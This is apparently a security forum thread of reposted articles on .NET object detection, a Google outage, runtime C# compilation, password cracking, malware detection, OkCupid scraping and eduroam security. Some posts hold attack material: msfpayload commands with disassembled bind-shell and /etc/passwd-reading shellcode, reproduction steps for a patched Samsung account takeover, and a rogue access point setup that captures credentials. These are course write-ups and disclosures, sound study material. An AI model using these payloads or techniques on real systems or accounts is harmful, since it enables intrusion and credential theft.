  10. Rapid Object Detection in .NET By Huseyin Atasoy, 25 Jan 2014 Introduction The most popular and the fastest implementation of Viola-Jones object detection algorithm is undoubtedly the implementation of OpenCV. But OpenCV requires wrapper classes to be usable with .NET languages and Bitmap objects of .NET have to be converted to IplImage format before it is used with OpenCV. On the other hand, programs that use OpenCV are dependent on all OpenCV libraries and their wrappers. These are not problems when functions of OpenCV are used. But if we need only to detect objects on a Bitmap, it isn't worth to make our programs dependent on all OpenCV libraries and wrappers... I have written a library (HaarCascadeClassifier.dll) that makes object detection possible in .NET without any other library requirement. It is an Open Source project that contains implementation of the Viola-Jones object detection algorithm. The library uses haar cascades generated by OpenCV (XML files) to detect particular objects such as faces. It can be used for object detection purposes or only to understand the algorithm and how parameters affect the result or the speed. Background In fact, my purpose is to share HaarCascadeClassifier.dll and its usage. So I will try to summarize the algorithm. Algorithm of Viola and Jones doesn't use pixels directly to detect objects. It uses rectangular features that are called "haar-like features". These features can be represented using 2, 3, or 4 rectangles. Articol: http://www.codeproject.com/Articles/436521/Rapid-Object-Detection-in-NET
  11. [h=3]Today’s outage for several Google services[/h]Earlier today, most Google users who use logged-in services like Gmail, Google+, Calendar and Documents found they were unable to access those services for approximately 25 minutes. For about 10 percent of users, the problem persisted for as much as 30 minutes longer. Whether the effect was brief or lasted the better part of an hour, please accept our apologies—we strive to make all of Google’s services available and fast for you, all the time, and we missed the mark today. The issue has been resolved, and we’re now focused on correcting the bug that caused the outage, as well as putting more checks and monitors in place to ensure that this kind of problem doesn’t happen again. If you’re interested in the technical explanation for what occurred and how it was fixed, read on. At 10:55 a.m. PST this morning, an internal system that generates configurations—essentially, information that tells other systems how to behave—encountered a software bug and generated an incorrect configuration. The incorrect configuration was sent to live services over the next 15 minutes, caused users’ requests for their data to be ignored, and those services, in turn, generated errors. Users began seeing these errors on affected services at 11:02 a.m., and at that time our internal monitoring alerted Google’s Site Reliability Team. Engineers were still debugging 12 minutes later when the same system, having automatically cleared the original error, generated a new correct configuration at 11:14 a.m. and began sending it; errors subsided rapidly starting at this time. By 11:30 a.m. the correct configuration was live everywhere and almost all users’ service was restored. With services once again working normally, our work is now focused on (a) removing the source of failure that caused today’s outage, and ( speeding up recovery when a problem does occur. We'll be taking the following steps in the next few days: 1. Correcting the bug in the configuration generator to prevent recurrence, and auditing all other critical configuration generation systems to ensure they do not contain a similar bug. 2. Adding additional input validation checks for configurations, so that a bad configuration generated in the future will not result in service disruption. 3. Adding additional targeted monitoring to more quickly detect and diagnose the cause of service failure. Posted by Ben Treynor, VP Engineering Sursa: Official Blog: Today’s outage for several Google services
  12. [h=1]Compiling C# Code at Runtime[/h]By Lumír L? Kojecký, 25 Jan 2014 [h=2]Introduction[/h] Sometimes, it is very useful to compile code at runtime. Personally, I use this feature mostly in these two cases: Simple web tutorials – writing a small piece of code into TextBox control and its execution instead of the necessity to own or to run some IDE. User-defined functions – I have written an application for symbolic regression with simple configuration file where user can choose some of my predefined functions (sin, cos, etc.). The user can also simply write his own mathematical expression with basic knowledge of C# language. If you want to use this feature, you don’t have to install any third-party libraries. All functionality is provided by the .NET Framework in Microsoft.CSharp and System.CodeCom.Compiler namespaces. Articol: http://www.codeproject.com/Tips/715891/Compiling-Csharp-Code-at-Runtime
  13. Samsung.com Account Takeover Vulnerability Write-up First of all let me say this: Hurray! They fixed it! After contacting Samsung multiply times I thought they’d completely blown me off in fixing this bug but it looks patched (hopefully!). EDIT: Samsung contacted me and said thanks for the report of the vulnerability. They seemed sincerely interested in fixing the problem – quite the opposite of my initial impression with them (their initial impression of me must’ve been odd considering I’m pretty sick with a cold at the time of this writing). The Vulnerability All Samsung.com accounts can be taken over due to an issue with character removal after authentication. When you register at New URL you can add extra spaces to the end of your account name and it will be registered as a separate account altogether. Alone this is not a big issue (other than perhaps spamming an email address by making multiple accounts with additional spaces after them). However, upon navigating to a Samsung subdomain such as Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators these trailing spaces are scrubbed from your username. Once this happens and you navigate back to Samsung.com you are authenticated as just a regular email address without any trailing spaces – effectively taking over your target’s account. So if your username was originally “admin@samsung.com<SPACE><SPACE>”, after visiting Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators it would be scrubbed to “admin@samsung.com”. Apparently scrubbing isn’t always a good thing (the security puns don’t get worse than that!) More Detailed instructions (Now patched, at least for shop.us.samsung.com): 1. Register an account at Samsung.com with the email address of a target, use Tamper Data or another HTTP intercept tool and add trailing spaces to the username. 2. Complete the account registration process 3. Navigate to “shop.us.samsung.com”, ex: http://shop.us.samsung.com/store?Action=DisplayCustomerServiceOrderSearchPage&Locale-en_US&SiteID=samsung 4. Navigate back to the main Samsung.com domain, ex: Galaxy Note 10.1- 2014 Edition 5. Proceed to attempt to add items to your cart and go to checkout page 6. Notice the account details and cards on file are those of your target Sadly because this isn’t a Samsung TV there is no bug bounty for this exploit, but oh well. Proof of Concept Video Sursa: Samsung.com Account Takeover Vulnerability Write-up | The Hacker Blog
  14. [h=2]PACK – Password Analysis & Cracking Kit[/h] PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers. Before using the PACK, you must establish a selection criteria of password lists. Since we are looking to analyze the way people create their passwords, we must obtain as large of a sample of leaked passwords as possible. One such excellent list is based on RockYou.com compromise. This list both provides large and diverse enough collection that provides a good results for common passwords used by similar sites (e.g. social networking). The analysis obtained from this list may not work for organizations with specific password policies. As such, selecting sample input should be as close to your target as possible. In addition, try to avoid obtaining lists based on already cracked passwords as it will generate statistics bias of rules and masks used by individual(s) cracking the list and not actual users. Please note this tool does not, and is not created to, crack passwords – it just aids the analysis of passwords sets so you can focus your cracking more accurately/efficiently/effectively. You can download PACK here: PACK-0.0.4.tar.gz Or read more here. Sursa: PACK - Password Analysis & Cracking Kit - Darknet - The Darkside
  15. MARD: A Framework for Metamorphic Malware Analysis and Real-Time Detection Shahid Alam Department of Computer Science University of Victoria, BC, V8P5C2 E-mail: salam@cs.uvic.ca November 11, 2013 Introduction and Motivation End point security is often the last defense against a security threat. An end point can be a desktop, a server, a laptop, a kiosk or a mobile device that connects to a network (Internet). Recent statistics by the ITU (International Telecommunications Union) [40] show that the number of Internet users (i.e: people connecting to the Internet using these end points) in the world have increased from 20% in 2006 to 35% (almost 2 billion in total) in 2011. A study carried out by Symantec about the impacts of cybercrime reports, that worldwide losses due to malware attacks and phishing between July 2011 and July 2012 were $110 billion [26]. According to the 2011 Symantec Internet security threat report [25] there was an 81% increase in the malware attacks over 2010, and 403 million new malware were created a 41% increase over 2010. In 2012 there was a 42% increase in the malware attacks over 2011. Web-based attacks increased by 30 percent in 2012. With these increases and the anticipated future increases, these end points pose a new security challenge [56] to the security professionals and researchers in industry and in academia, to devise new methods and techniques for malware detection and protection. There are numerous denitions in the literature of a malware, also called a malicious code that includes viruses, worms, spywares and trojans. Here I am going to use one of the earliest denitions by Gary McGraw and Greg Morrisett [49]: Malicious code is any code added, changed, or removed from a software system in order to intentionally cause harm or subvert the intended function of the system. A malware carries out activities such as: setting up a back door for a bot, setting up a keyboard logger and stealing personal information etc. Antimalware software detects and neutralizes the eects of a malware. There are two basic detection techniques [39]: anomaly-based and signature-based. Anomaly-based detection technique uses the knowledge of the behavior of a normal program to decide if the program under inspection is malicious or not. Signature-based detection technique uses the characteristics of a malicious program to decide if the program under inspection is malicious or not. Each of the techniques can be performed statically (before the program executes), dynamically (during or after the program execution) or both statically and dynamically (hybrid). Download: http://webhome.cs.uvic.ca/~salam/PhD/TR-MARD.pdf
  16. Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I choosed the linux/x86/exec shellcode as first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx 00000005 66682D63 push word 0x632d 00000009 89E7 mov edi,esp 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp 00000017 52 push edx 00000018 E803000000 call dword 0x20 0000001D 6C insb 0000001E 7300 jnc 0x20 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 I will now comment the relevant lines of the shellcode. 00000000 6A0B push byte +0xb 00000002 58 pop eax EAX is set to 0xb = 11. This is the number for execve: $ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_execve 11 ... SNIP ... 00000003 99 cdq 00000004 52 push edx Set edx to zero and push it in the stack for termination. 00000005 66682D63 push word 0x632d This pushes “-c” on the stack. 00000009 89E7 mov edi,esp Move the stackpointer to EDI. So EDI is pointing to “-c”. 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp Push /bin/sh to the stack and move the stackpointer to EBX. EBX is pointing to “/bin/sh”. It can be seen, that the ls command is not executed directly. A shell is called with the -c option. From the bash man page: “-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.” 00000017 52 push edx Push some zeros again. 00000018 E803000000 call dword 0x20 This one jumps to 0×20. 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 EDI (-c), EBX (/bin/sh) and are pushed on the stack, ECX is moved to ESP and the function is called. Now here comes the interesting part. It is not possible to get the command “ls” from debugging with gdb nor analyzing it with libemu. But the ls (as hex: 6c 73) command is in the code. 0000001D 6C insb 0000001E 7300 jnc 0x20 I think that the ls is pushed on the stack too, although the debugger does not notice anything of that… hmpf. So maybe libemu can help us here. For analyzing the shellcode with libemu I use: $ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot The ls command should be executed. The output is showing exactly how the execve call is build. ... SNIP ... [emu 0x0x8f3e088 debug ] Flags: int execve ( const char * dateiname = 0x00416fc0 => = "/bin/sh"; const char * argv[] = [ = 0x00416fb0 => = 0x00416fc0 => = "/bin/sh"; = 0x00416fb4 => = 0x00416fc8 => = "-c"; = 0x00416fb8 => = 0x0041701d => = "ls"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... Here it can be seen, that the “ls” command is on the stack too. From the Exec.dot file a diagram can be made for illustrating the programm execution. dot Exec.dot -Tpng -o Exec.dot.png Exec.dot That was it for the first shellcode. linux/x86/shell_bind_tcp For the second shellcode to analyze I choosed linux/x86/shell_bind_tcp. Disassembling works as follows: $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u - 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 And here is the output from the libemu analysis. $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot ... SNIP ... int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; int listen ( int s = 14; int backlog = 0; ) = 0; int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; int dup2 ( int oldfd = 19; int newfd = 14; ) = 14; int dup2 ( int oldfd = 19; int newfd = 13; ) = 13; int dup2 ( int oldfd = 19; int newfd = 12; ) = 12; int dup2 ( int oldfd = 19; int newfd = 11; ) = 11; int dup2 ( int oldfd = 19; int newfd = 10; ) = 10; int dup2 ( int oldfd = 19; int newfd = 9; ) = 9; int dup2 ( int oldfd = 19; int newfd = 8; ) = 8; int dup2 ( int oldfd = 19; int newfd = 7; ) = 7; int dup2 ( int oldfd = 19; int newfd = 6; ) = 6; int dup2 ( int oldfd = 19; int newfd = 5; ) = 5; int dup2 ( int oldfd = 19; int newfd = 4; ) = 4; int dup2 ( int oldfd = 19; int newfd = 3; ) = 3; int dup2 ( int oldfd = 19; int newfd = 2; ) = 2; int dup2 ( int oldfd = 19; int newfd = 1; ) = 1; int dup2 ( int oldfd = 19; int newfd = 0; ) = 0; int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... I analyze the relevant parts of the shellcode, I will use both, the disassembly and the libemu output for further explanation. 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 First the EBX and the EAX registers are filled with zeros. EBX is pushed on the stack, then EBX is set to one and again pushed on the stack. After this two is pushed on the stack. After this the stack address is set to ECX, and EAX is 66. This is the syscall (102) for the socketcall function, which is called afterward. In this case the socket() functions is executed. The rorresponding libemu output: int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 To shorten things a little, this part calls the bind function (which is EAX syscall 102 and EBX 1 = SYS_SOCKET = socket() ). This correspondence with the libemu output (the whole output can be seen below). int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; 5c11 is port 4444 btw. 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 Here EAX = ffffff66 and EBX = 4, this is defining the listen() function. $ less /usr/include/linux/net.h | grep 4 #define SYS_LISTEN 4 /* sys_listen(2) */ Here is the libemu output: int listen ( int s = 14; int backlog = 0; ) = 0; 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 EBX is now 5, which defines the accept function… int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 EAX = 3f = 63, this is the syscall for dup2. $ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_dup2 63 This procedure is repeated until ECX=0, so we have any descriptor included. 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode. int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; I also used the debugger for analyzing the shellcode, but I think the output there is no more help. And finally the flowchart. $ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png shell_bind_tcp.dot So that was it for the second analysis. linux/x86/read_file So let us start by disassembling the shellcode: $ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u - 00000000 EB36 jmp short 0x38 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Libemu and sctest did not work for me. So I will only look at the disassembly and debugging. First things first: The shellcode is using the JMP-CALL-POP technique. This can be seen very good by stepping throught the code but also by having a look at the disassembled code. 00000000 EB36 jmp short 0x38 Jump to address 0×38. 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Call 0×2. Be aware 3D – 48 is a data section. Here is nothing else as the path: /etc/passwd. 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 Move 5 to EAX for syscall 5, which is open(). Point EBX to /etc/passwd, and execute. Return the file descriptor to EAX, for example 3. 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 Here the syscall for read() is executed. For this, EAX and EBX are set to 3. EBX contains the file descriptor, ECX points EDI. EDX which presents the size is set to 1000. 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 So finally the result is written (syscall 4 is write()) to the standart output. 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 And exit. So that was it for the last analysis. This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Assembly Language and Shellcoding on Linux
  17. How a Math Genius Hacked OkCupid to Find True Love By Kevin Poulsen 01.21.14 6:30 AM Mathematician Chris McKinlay hacked OKCupid to find the girl of his dreams. Emily Shur Chris McKinlay was folded into a cramped fifth-floor cubicle in UCLA’s math sciences building, lit by a single bulb and the glow from his monitor. It was 3 in the morn*ing, the optimal time to squeeze cycles out of the supercomputer in Colorado that he was using for his PhD dissertation. (The subject: large-scale data processing and parallel numerical methods.) While the computer chugged, he clicked open a second window to check his OkCupid inbox. McKinlay, a lanky 35-year-old with tousled hair, was one of about 40 million Americans looking for romance through websites like Match.com, J-Date, and e-Harmony, and he’d been searching in vain since his last breakup nine months earlier. He’d sent dozens of cutesy introductory messages to women touted as potential matches by OkCupid’s algorithms. Most were ignored; he’d gone on a total of six first dates. On that early morning in June 2012, his compiler crunching out machine code in one window, his forlorn dating profile sitting idle in the other, it dawned on him that he was doing it wrong. He’d been approaching online matchmaking like any other user. Instead, he realized, he should be dating like a mathematician. OkCupid was founded by Harvard math majors in 2004, and it first caught daters’ attention because of its computational approach to matchmaking. Members answer droves of multiple-choice survey questions on everything from politics, religion, and family to love, sex, and smartphones. On average, respondents select 350 questions from a pool of thousands—“Which of the following is most likely to draw you to a movie?” or “How important is religion/God in your life?” For each, the user records an answer, specifies which responses they’d find acceptable in a mate, and rates how important the question is to them on a five-point scale from “irrelevant” to “mandatory.” OkCupid’s matching engine uses that data to calculate a couple’s compatibility. The closer to 100 percent—mathematical soul mate—the better. But mathematically, McKinlay’s compatibility with women in Los Angeles was abysmal. OkCupid’s algorithms use only the questions that both potential matches decide to answer, and the match questions McKinlay had chosen—more or less at random—had proven unpopular. When he scrolled through his matches, fewer than 100 women would appear above the 90 percent compatibility mark. And that was in a city containing some 2 million women (approximately 80,000 of them on OkCupid). On a site where compatibility equals visibility, he was practically a ghost. He realized he’d have to boost that number. If, through statistical sampling, McKinlay could ascertain which questions mattered to the kind of women he liked, he could construct a new profile that honestly answered those questions and ignored the rest. He could match every woman in LA who might be right for him, and none that weren’t. Chris McKinlay used Python scripts to riffle through hundreds of OkCupid survey questions. He then sorted female daters into seven clusters, like “Diverse” and “Mindful,” each with distinct characteristics. Maurico Alejo Even for a mathematician, McKinlay is unusual. Raised in a Boston suburb, he graduated from Middlebury College in 2001 with a degree in Chinese. In August of that year he took a part-time job in New York translating Chinese into English for a company on the 91st floor of the north tower of the World Trade Center. The towers fell five weeks later. (McKinlay wasn’t due at the office until 2 o’clock that day. He was asleep when the first plane hit the north tower at 8:46 am.) “After that I asked myself what I really wanted to be doing,” he says. A friend at Columbia recruited him into an offshoot of MIT’s famed professional blackjack team, and he spent the next few years bouncing between New York and Las Vegas, counting cards and earning up to $60,000 a year. The experience kindled his interest in applied math, ultimately inspiring him to earn a master’s and then a PhD in the field. “They were capable of using mathema*tics in lots of different situations,” he says. “They could see some new game—like Three Card Pai Gow Poker—then go home, write some code, and come up with a strategy to beat it.” Now he’d do the same for love. First he’d need data. While his dissertation work continued to run on the side, he set up 12 fake OkCupid accounts and wrote a Python script to manage them. The script would search his target demographic (heterosexual and bisexual women between the ages of 25 and 45), visit their pages, and scrape their profiles for every scrap of available information: ethnicity, height, smoker or nonsmoker, astrological sign—“all that crap,” he says. To find the survey answers, he had to do a bit of extra sleuthing. OkCupid lets users see the responses of others, but only to questions they’ve answered themselves. McKinlay set up his bots to simply answer each question randomly—he wasn’t using the dummy profiles to attract any of the women, so the answers didn’t mat*ter—then scooped the women’s answers into a database. McKinlay watched with satisfaction as his bots purred along. Then, after about a thousand profiles were collected, he hit his first roadblock. OkCupid has a system in place to prevent exactly this kind of data harvesting: It can spot rapid-fire use easily. One by one, his bots started getting banned. He would have to train them to act human. He turned to his friend Sam Torrisi, a neuroscientist who’d recently taught McKinlay music theory in exchange for advanced math lessons. Torrisi was also on OkCupid, and he agreed to install spyware on his computer to monitor his use of the site. With the data in hand, McKinlay programmed his bots to simulate Torrisi’s click-rates and typing speed. He brought in a second computer from home and plugged it into the math department’s broadband line so it could run uninterrupted 24 hours a day. After three weeks he’d harvested 6 million questions and answers from 20,000 women all over the country. McKinlay’s dissertation was relegated to a side project as he dove into the data. He was already sleeping in his cubicle most nights. Now he gave up his apartment entirely and moved into the dingy beige cell, laying a thin mattress across his desk when it was time to sleep. For McKinlay’s plan to work, he’d have to find a pattern in the survey data—a way to roughly group the women according to their similarities. The breakthrough came when he coded up a modified Bell Labs algorithm called K-Modes. First used in 1998 to analyze diseased soybean crops, it takes categorical data and clumps it like the colored wax swimming in a Lava Lamp. With some fine-tuning he could adjust the viscosity of the results, thinning it into a slick or coagulating it into a single, solid glob. He played with the dial and found a natural resting point where the 20,000 women clumped into seven statistically distinct clusters based on their questions and answers. “I was ecstatic,” he says. “That was the high point of June.” He retasked his bots to gather another sample: 5,000 women in Los Angeles and San Francisco who’d logged on to OkCupid in the past month. Another pass through K-Modes confirmed that they clustered in a similar way. His statistical sampling had worked. Now he just had to decide which cluster best suited him. He checked out some profiles from each. One cluster was too young, two were too old, another was too Christian. But he lingered over a cluster dominated by women in their mid-twenties who looked like indie types, musicians and artists. This was the golden cluster. The haystack in which he’d find his needle. Somewhere within, he’d find true love. Actually, a neighboring cluster looked pretty cool too—slightly older women who held professional creative jobs, like editors and designers. He decided to go for both. He’d set up two profiles and optimize one for the A group and one for the B group. He text-mined the two clusters to learn what interested them; teaching turned out to be a popular topic, so he wrote a bio that emphasized his work as a math professor. The important part, though, would be the survey. He picked out the 500 questions that were most popular with both clusters. He’d already decided he would fill out his answers honestly—he didn’t want to build his future relationship on a foundation of computer-generated lies. But he’d let his computer figure out how much importance to assign each question, using a machine-learning algorithm called adaptive boosting to derive the best weightings. Sursa: How a Math Genius Hacked OkCupid to Find True Love - Wired Science
  18. eduroam WiFi security audit or why it is broken by design Over Christmas I got a TP-Link TL-WN722N USB WiFi device which is supported by hostapd and finally I could test what I always wanted to test: eduroam. But first, what is eduroam? Eduroam is a WiFi network located at universities around the world with the goal to provide internet access to students and university staff on every university that supports eduroam ( https://en.wikipedia.org/wiki/Eduroam ). This means I can connect to the internet with eduroam at a university in France with my user credentials from my university in Germany. Sounds good, but how does it work? Well, the WiFi network uses WPA-Enterprise, which means you connect to an access point and the access point uses an radius server to authenticate you. Generally not a bad idea. But my tests have shown that the eduroam network is broken by design. In advance First things first. Some of my notes that I took from my tests can be seen here. I will provide them as a "POC||GTFO". But I stripped them to not provide a step by step tutorial in "how to pwn eduroam". The set-up I configured a VM with Debian Wheezy with an installation of hostapd. I never had configured a radiusd and wondered how I can get the user credentials if a client device would authenticate to my rogue access point. Well, I found this cool project https://github.com/brad-anton/freeradius-wpe.git. This does everything for me and I do not have to patch the radiusd myself. But honestly, I do not trust this modified radiusd entirely and after I configured everything I turned of the network interface of the VM which provides an internet connection to prevent the radiusd from leaking something of my tests to the internet. Test without a certificate modification On my first test I just set everything up and started it. I started wpa_supplicant on my laptop and it does not connect to the rogue access point because the certificate is wrong. Ok, but what with my Android device. I activated the WiFi on my mobile phone and ... WTF I am connected to the rogue access point. In the log file of the rogue access point I can read my user credentials in PLAINTEXT. Ok, that is not good. But what went wrong? The certificate used by the rogue access point is still invalid. The configuration on my Android device is completly flawed. I configured my Android device like the tutorial on my universities website said. The tutorial said that I do not have to configure any CA and use PAP for the phase2 of the WPA-Enterprise authentication. Now you can say "Idiot, everyone can see that this is wrong!". But to my defense, I always thought that Android then uses its own installed CAs to check if the certificate of the access point is valid. Hell, even the network-manager on ubuntu warns you if you give no CA in the settings. And I used PAP (I knew it sends the user credentials in cleartext) because I thought of the tutorials of my university that eduroam does only support PAP for the phase2 authentication. But both thoughts were wrong. After I installed the "Deutsche_Telekom_Root_CA_2" CA on my Android device and used it in the WiFi configuration it no longer connects to the rogue access point. Also, when the wpa_supplicant configuration misses this line: ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem" it also ignores the invalid certificate of the access point and just connects to it. I wrote the helpdesk of my university about the wrong tutorial for using eduroam on Android devices. The helpdesk replied to me that they knew this problem with the CA but Android is not able to verify the certificate of the access point. This is obviously wrong. And the funny thing about this is, they used screenshots in their tutorial to make it easier for everyone to configure eduroam on Android devices. And on these screenshots you can see the "CA certificate" option which is just ignored. Also their reply told me some other interesting things about eduroam, which I checked in my next tests. As a summary for my first test: always configure the CA for eduroam (and in general for all WPA-Enterprise WiFi networks) and always use MSCHAPv2 instead of PAP. Even if your device connects to a rogue access point the adversary only gets challenge-response values and has to brute-force this. When your password is strong enough, the adversary can not use your credentials (at least he has to spend time brute-forcing MSCHAPv2 ...). Test with an own certificate In the eMail reply of the helpdesk of my university they wrote me that when the user added the CA to his WiFi settings, this would destroy the idea behind eduroam (to be able to connect to every eduroam access point in the world). First, I wondered about the "destroy the idea behind eduroam" part but then I thought "They would not be so stupid, would they?". I always thought that they agreed to use the "Deutsche_Telekom_Root_CA_2" CA for eduroam. But this is not the case. A friend of mine was in Belgium and had to change the configured CA in his WiFi settings to connect to eduroam there. I searched through some websites for eduroam tutorials of universities of other countries than Germany and they all used different CAs. Normally, the access point is configured to use a specific radius server which will send the certificate to the client (I do not know if it is even possible to use WPA-Enterprise in any other way). This means that by not agreeing on one CA for the entire eduroam infrastructure, the user has to NOT configure any CA in his WiFi settings to be able to use eduroam in the way it was intended to. And with this, we have the first reason for eduroam being insecure by design. The eMail also stated that even if the user added the CA to his WiFi configuration, this would not help. An adversary could get a certificate signed by the CA and could therefore set up a rouge access point. This statement is true. But this holds for every public key infrastructure. For HTTPS for example a CA should not sign my certificate for "gmail.com" (unless I can prove that this is my domain/address). And at this point a question comes to mind. The client gets the certificate by the access point and then checks with the configured CA if it is valid. But valid for what address? Normally, the CN (common name) in the certificate is checked with the used address. But with what address is the certificate provided by the radius server checked? A valid connection to the eduroam WiFi at my university with wpa_supplicant looks like this: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 